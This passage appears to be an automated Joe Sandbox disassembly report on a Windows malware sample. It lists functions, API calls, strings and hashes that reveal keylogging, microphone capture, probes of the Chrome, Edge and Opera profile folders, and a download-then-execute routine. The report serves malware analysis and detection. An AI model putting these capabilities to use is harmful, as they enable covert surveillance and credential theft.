Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: H_prologsend
String ID: NG$}E
API String ID: 2679777229-2251168990
Opcode ID: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
Instruction ID: 126f82fd0981d999db64f1723b11cbbd37434c19f4fab421e57e015ee069c893
Opcode Fuzzy Hash: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
Instruction Fuzzy Hash: 81213D32E801089FCB16FBA4E951AFEB777EF54310F20416AA526A3190EF345E09CF94

Function 0213525B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 02135297

Part of subcall function 0214B756: GetLocalTime.KERNEL32(00000000), ref: 0214B770

GetLocalTime.KERNEL32(?), ref: 021352EE

Strings

KeepAlive | Enabled | Timeout: , xrefs: 02135286

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
Instruction ID: 5d9cef1100b2641f93fc22d9f1069de98c9c840cf2e4a37ba8980cbac72db505
Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
Instruction Fuzzy Hash: B621F662D44380AFC705F734DC44B6BBB97A755308FC40469D8490B165DBB59A48CBAB

Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00416640
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 8202d5560c644e4ad3e398e764b69cfbb2f44cc0e9d4a2f1a57a901a090a03ef
Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
Opcode Fuzzy Hash: 8202d5560c644e4ad3e398e764b69cfbb2f44cc0e9d4a2f1a57a901a090a03ef
Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A

Function 021468A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 021468A7
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 02146909

Strings

!D@, xrefs: 021472F0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: cde9a9facb46a4b0304b154c4ebb8b37c8fac7df66e0610b7651ed0e317c1ddd
Instruction ID: 04dbad291a575e583835657870823e9ec0f6007f5450f5e6b3ce45d233bc6bb8
Opcode Fuzzy Hash: cde9a9facb46a4b0304b154c4ebb8b37c8fac7df66e0610b7651ed0e317c1ddd
Instruction Fuzzy Hash: 33119E716883429ED619FF70DD949AE73ABAF90704F400C2DEA4683085EF319D09CA12

Function 0214B756 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0214B770

Strings

%02i:%02i:%02i:%03i , xrefs: 0214B785
PkGNG, xrefs: 0214B756

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: %02i:%02i:%02i:%03i $PkGNG
API String ID: 481472006-224355505
Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction ID: 465962fd5c8508932127f112346541a253bbf4d4e89e16e0d3b6a6befe427f17
Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction Fuzzy Hash: 431151725882449FC706FB64DD509BE73EBBB54344F50052EF99582094FF34EE48CA56

Function 02145D51 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 02145D76

Strings

!D@, xrefs: 021472F0
NG, xrefs: 02145DA5

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Event
String ID: !D@$NG
API String ID: 4201588131-2721294649
Opcode ID: e4d71aff3f2fe3f8721a960ccbb7594573a45445a8ec9114e4e6326f33baa27e
Instruction ID: e725b475d0eb728fbabb3cdb201563537d72f32a1e5af0401f96deb406a25565
Opcode Fuzzy Hash: e4d71aff3f2fe3f8721a960ccbb7594573a45445a8ec9114e4e6326f33baa27e
Instruction Fuzzy Hash: FB11A3365442549FC621FB74DC40EEFB3AAAB56320F40492DEA99831D0EF306A19CB92

Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C

Strings

hYG, xrefs: 0041AD46
alarm.wav, xrefs: 0041AD27

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F

Function 0213B2B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0213B3CB: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0213B3D9
Part of subcall function 0213B3CB: wsprintfW.USER32 ref: 0213B45A

Part of subcall function 0214B756: GetLocalTime.KERNEL32(00000000), ref: 0214B770

CloseHandle.KERNEL32(?), ref: 0213B31B
UnhookWindowsHookEx.USER32 ref: 0213B32E

Strings

Online Keylogger Stopped, xrefs: 0213B2C8, 0213B2D0, 0213B2F7

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction ID: b70b1eec6814d086965565fe433bb8a529df92f4eb96287b5345ee8f2cb55010
Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
Instruction Fuzzy Hash: C8012831A48210AFC7227B24CC0AB7F7BB39F42305F40005DD88602181FB7159559BD7

Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CloseHandle.KERNEL32(?), ref: 0040B0B4
UnhookWindowsHookEx.USER32 ref: 0040B0C7

Strings

Online Keylogger Stopped, xrefs: 0040B061, 0040B069, 0040B090

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: e9cc3dc02fa66a00fd0c7e3a736ac5f936d233d2604cf8cd593f27ccf8bdf72e
Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
Opcode Fuzzy Hash: e9cc3dc02fa66a00fd0c7e3a736ac5f936d233d2604cf8cd593f27ccf8bdf72e
Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE

Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24

Strings

PkGNG, xrefs: 00448BB5
LCMapStringEx, xrefs: 00448BCE

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$PkGNG
API String ID: 2568140703-1065776982
Opcode ID: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
Opcode Fuzzy Hash: 6176356b550008225c45ed95f9c308570f022b01c1c57b82113652449518e224
Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99

Function 02131A53 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(00474D94,00000020,00476BD4,00476BD4,00476B50,00474EE0,?,00000000,02131C7C), ref: 02131AB0
waveInAddBuffer.WINMM(00474D94,00000020,?,00000000,02131C7C), ref: 02131AC6

Strings

XMG, xrefs: 02131A5F

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction ID: 9e3ca43a42de39ef007cceab3f84c0665b94de8cd7f72ad753f176d791bbf114
Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction Fuzzy Hash: 0601D1B1340311AFDB11AF64EC44925BBEAFB893007004139E909C7721EB71AC94CFA8

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(006A7AA8,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
waveInAddBuffer.WINMM(006A7AA8,00000020,?,00000000,00401A15), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Function 0214CD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,02134CA7), ref: 0214CD70
LocalFree.KERNEL32(?,?), ref: 0214CD96

Strings

PkGNG, xrefs: 0214CD48

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID: PkGNG
API String ID: 1427518018-263838557
Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction ID: aa091981f28bf44cfca6913e10944fb51f85ffb161f117789b7cc15da0cfdbd9
Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction Fuzzy Hash: 0FF0C230A80109BF9F09B7A5EC49DFF776FEF84301B10006AB91AA2090EFB15D059AA4

Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32

Strings

JD, xrefs: 00448B29, 00448B16
IsValidLocaleName, xrefs: 00448AF7, 00448B01

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$JD
API String ID: 1901932003-2234456777
Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E

Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040C4E0
UserProfile, xrefs: 0040C4CA

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE

Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

Strings

UserProfile, xrefs: 0040C52D
\AppData\Local\Microsoft\Edge\, xrefs: 0040C543

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE

Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC

Strings

AppData, xrefs: 0040C590
\Opera Software\Opera Stable\, xrefs: 0040C5A6

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA

Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B64B

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1

Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

[AltR], xrefs: 0040B681
[AltL], xrefs: 0040B68D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
String ID: [AltL]$[AltR]
API String ID: 2738857842-2658077756
Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF

Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E

Strings

uD, xrefs: 0044ED05

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: uD
API String ID: 0-2547262877
Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49

Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00448972
PkGNG, xrefs: 00448959

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$PkGNG
API String ID: 2086374402-949981407
Opcode ID: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
Opcode Fuzzy Hash: 14ade04f60bc73be69f0a8e2d41fd66075f217d790f0afe8d3aaf6a6c36f91f3
Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE

Function 021857B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

___initconout.LIBCMT ref: 021857C2

Part of subcall function 02186D84: CreateFileW.KERNEL32(004654A8,40000000,00000003,00000000,00000003,00000000,00000000,021857C7,00000000,PkGNG,0217B804,?,FF8BC35D,00000000,?,00000000), ref: 02186D97

WriteConsoleW.KERNEL32(004719B0,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0217B804,?,FF8BC35D,00000000,?,00000000,PkGNG,0217BD80,?), ref: 021857E5

Strings

PkGNG, xrefs: 021857B4

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ConsoleCreateFileWrite___initconout
String ID: PkGNG
API String ID: 3087715906-263838557
Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction ID: 254ee211c9248143e2fcb9bf0a1d512146fd248089d91ff32fe4aef593ab43d3
Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction Fuzzy Hash: B3E0ED74140209BBDA20EB68DC84EB9322DEB01370FE04324FA29C62D0EB30DD40CBA1

Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8

Strings

!D@, xrefs: 00417089
open, xrefs: 004161A2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: f50076b0e495a508372399c0a11c0e2f7a0e98d8e7ef6fee2520dc6e0eb8af38
Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
Opcode Fuzzy Hash: f50076b0e495a508372399c0a11c0e2f7a0e98d8e7ef6fee2520dc6e0eb8af38
Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A

Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

___initconout.LIBCMT ref: 0045555B

Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30

WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E

Strings

PkGNG, xrefs: 0045554D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ConsoleCreateFileWrite___initconout
String ID: PkGNG
API String ID: 3087715906-263838557
Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759

Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B6A5

Strings

[CtrlR], xrefs: 0040B6C2
[CtrlL], xrefs: 0040B6D3

Memory Dump Source

